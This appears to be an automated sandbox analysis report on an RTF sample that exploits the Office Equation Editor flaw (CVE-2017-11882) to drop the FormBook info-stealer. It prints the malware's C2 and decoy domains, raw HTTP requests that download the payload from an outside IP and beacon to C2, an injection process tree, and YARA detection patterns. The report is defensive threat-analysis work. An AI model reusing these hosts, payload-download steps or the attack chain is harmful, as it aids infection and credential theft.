Windows Analysis Report 3nkW4MtwSD

Overview

General Information

Sample Name: 3nkW4MtwSD (renamed file extension from none to rtf)
Analysis ID: 528701
MD5: 5aad2b6635b3069402aaf6ff389bea64
SHA1: a8617ddffd6c934fcf3f64c6e84b1a23ffa9d092
SHA256: 718dcc870c0de487595feed4e5e43dc70fba6fa2aaac15462c0ba5c20028e7bd
Tags: rtf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2592 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1592 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2652 cmdline: "C:\Users\Public\vbc.exe" MD5: 075BD1E3E3E0C01794EE6A84BE2C585A)
      • vbc.exe (PID: 2412 cmdline: C:\Users\Public\vbc.exe MD5: 075BD1E3E3E0C01794EE6A84BE2C585A)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • raserver.exe (PID: 1892 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
          • cmd.exe (PID: 772 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
    00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security

        Unpacked PEs

        Source | Rule | Description | Author | Strings
        4.0.vbc.exe.400000.9.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.0.vbc.exe.400000.9.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.0.vbc.exe.400000.9.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          4.2.vbc.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
            4.2.vbc.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
            • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

            Sigma Overview

            Exploits:

            Sigma detected: EQNEDT32.EXE connecting to internet
            Source: Network Connection, Author: Joe Security, Data: DestinationIp: 198.46.199.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1592, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXE
            Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1592, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

            System Summary:

            Sigma detected: Droppers Exploiting CVE-2017-11882
            Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1592, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2652
            Sigma detected: Execution from Suspicious Folder
            Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1592, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2652

            Jbx Signature Overview

            AV Detection:

            Found malware configuration
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
            Multi AV Scanner detection for submitted file
            Source: 3nkW4MtwSD.rtf, Virustotal: Detection: 56%
            Yara detected FormBook
            Source: Yara match, File source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY
            Antivirus / Scanner detection for submitted sample
            Source: 3nkW4MtwSD.rtf, Avira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: 4.0.vbc.exe.400000.9.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.2.vbc.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.0.vbc.exe.400000.7.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.0.vbc.exe.400000.5.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
            Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
            Source: Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: global traffic, DNS query: name: www.mountfrenchlodge.net
            Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop ebx, 4_2_00407B1A
            Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 4_2_0040E460
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop edi, 6_2_000CE460
            Source: C:\Windows\SysWOW64\raserver.exe, Code function: 4x nop then pop ebx, 6_2_000C7B1B
            Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 198.46.199.153:80

            Networking:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe, Domain query: www.cuteprofessionalscrubs.com
            Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exe, Domain query: www.mountfrenchlodge.net
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractor, URLs: www.cuteprofessionalscrubs.com/9gr5/
            Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
            Source: global traffic, HTTP traffic detected:
              GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1
              Host: www.mountfrenchlodge.net
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
            Source: global traffic, HTTP traffic detected:
              GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1
              Host: www.cuteprofessionalscrubs.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
            Source: Joe Sandbox View, IP Address: 198.46.199.153
            Source: global traffic, HTTP traffic detected:
              HTTP/1.1 200 OK
              Date: Thu, 25 Nov 2021 16:23:57 GMT
              Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25
              Last-Modified: Thu, 25 Nov 2021 02:23:58 GMT
              ETag: "b4a00-5d193aabff887"
              Accept-Ranges: bytes
              Content-Length: 739840
              Keep-Alive: timeout=5, max=100
              Connection: Keep-Alive
              Content-Type: application/x-msdownload
            Source: global traffic, HTTP traffic detected:
              GET /70007/vbc.exe HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 198.46.199.153
              Connection: Keep-Alive
            Source: global traffic, HTTP traffic detected:
              HTTP/1.1 403 Forbidden
              Server: openresty
              Date: Thu, 25 Nov 2021 16:25:23 GMT
              Content-Type: text/html
              Content-Length: 275
              ETag: "6192576d-113"
              Via: 1.1 google
              Connection: close
              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: global traffic, HTTP traffic detected:
              HTTP/1.1 403 Forbidden
              Server: openresty
              Date: Thu, 25 Nov 2021 16:25:43 GMT
              Content-Type: text/html
              Content-Length: 275
              ETag: "6192576d-113"
              Via: 1.1 google
              Connection: close
              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: unknown, TCP traffic detected without corresponding DNS query: 198.46.199.153
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE - File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B3E201F6-E172-4FB7-8EA2-C5E78A0177C3}.tmp
            Source: unknown - DNS traffic detected: queries for: www.mountfrenchlodge.net
            Source: global traffic - HTTP traffic detected:
                GET /70007/vbc.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 198.46.199.153
                Connection: Keep-Alive
            Source: global traffic - HTTP traffic detected:
                GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1
                Host: www.mountfrenchlodge.net
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:
            Source: global traffic - HTTP traffic detected:
                GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1
                Host: www.cuteprofessionalscrubs.com
                Connection: close
                Data Raw: 00 00 00 00 00 00 00
                Data Ascii:

            E-Banking Fraud:

            Yara detected FormBook

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - File created: C:\Users\Public\vbc.exe
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
